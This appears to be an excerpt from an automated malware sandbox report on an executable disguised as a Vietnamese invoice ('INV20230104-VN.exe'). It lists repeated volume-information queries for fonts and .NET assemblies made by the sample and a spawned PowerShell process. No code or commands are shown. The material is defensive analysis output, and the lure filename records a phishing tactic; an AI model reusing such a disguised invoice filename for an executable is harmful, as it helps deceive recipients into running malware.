Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
